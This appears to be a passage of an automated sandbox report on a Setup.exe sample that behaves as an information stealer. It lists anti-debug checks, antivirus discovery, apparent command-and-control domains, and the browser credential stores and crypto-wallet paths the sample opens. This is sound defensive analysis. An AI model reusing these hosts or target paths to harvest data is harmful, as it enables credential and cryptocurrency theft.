              Source: Setup.exe, 00000000.00000003.1823765883.0000000001002000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWw
              Source: powershell.exe, 00000004.00000002.2018847996.0000000004686000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
              Source: powershell.exe, 00000004.00000002.2018847996.0000000004686000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
              Source: Setup.exe, 00000000.00000003.1823765883.0000000001002000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: powershell.exe, 00000004.00000002.2018847996.0000000004686000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
              Source: Setup.exe, 00000000.00000003.1995816294.0000000000FD1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
              Source: C:\Users\user\Desktop\Setup.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F5041F mov edx, dword ptr fs:[00000030h]0_2_00F5041F
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F509DF mov eax, dword ptr fs:[00000030h]0_2_00F509DF
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F5102F mov eax, dword ptr fs:[00000030h]0_2_00F5102F
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F5102E mov eax, dword ptr fs:[00000030h]0_2_00F5102E
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00F50D8F mov eax, dword ptr fs:[00000030h]0_2_00F50D8F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: Setup.exeString found in binary or memory: tentabatte.lat
              Source: Setup.exeString found in binary or memory: bashfulacid.lat
              Source: Setup.exeString found in binary or memory: talkynicer.lat
              Source: Setup.exeString found in binary or memory: curverpluch.lat
              Source: Setup.exeString found in binary or memory: manyrestro.lat
              Source: Setup.exeString found in binary or memory: shapestickyr.lat
              Source: Setup.exeString found in binary or memory: wordyfindy.lat
              Source: Setup.exeString found in binary or memory: slipperyloo.lat
              Source: Setup.exeString found in binary or memory: beefshooti.click
              Source: C:\Users\user\Desktop\Setup.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: Setup.exe, 00000000.00000003.1931764035.000000000107A000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1931882448.0000000003920000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1951085152.000000000105C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\Setup.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: Process Memory Space: Setup.exe PID: 6596, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Setup.exeString found in binary or memory: Wallets/Electrum
              Source: Setup.exeString found in binary or memory: Wallets/ElectronCash
              Source: Setup.exeString found in binary or memory: window-state.json
              Source: Setup.exe, 00000000.00000003.1996415854.0000000001066000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: jenllpjcblmjkfcffne","ez":"Jaxx Liberty"},{"en":"fihkakfobkmkjojpchpfgcmhfjn
              Source: Setup.exe, 00000000.00000003.1909177966.000000000101C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: Setup.exe, 00000000.00000003.1903279526.000000000105D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: *exodus*
              Source: Setup.exeString found in binary or memory: Wallets/Ethereum
              Source: Setup.exe, 00000000.00000003.1903279526.000000000105D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: Setup.exe, 00000000.00000002.1998349657.0000000000FFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
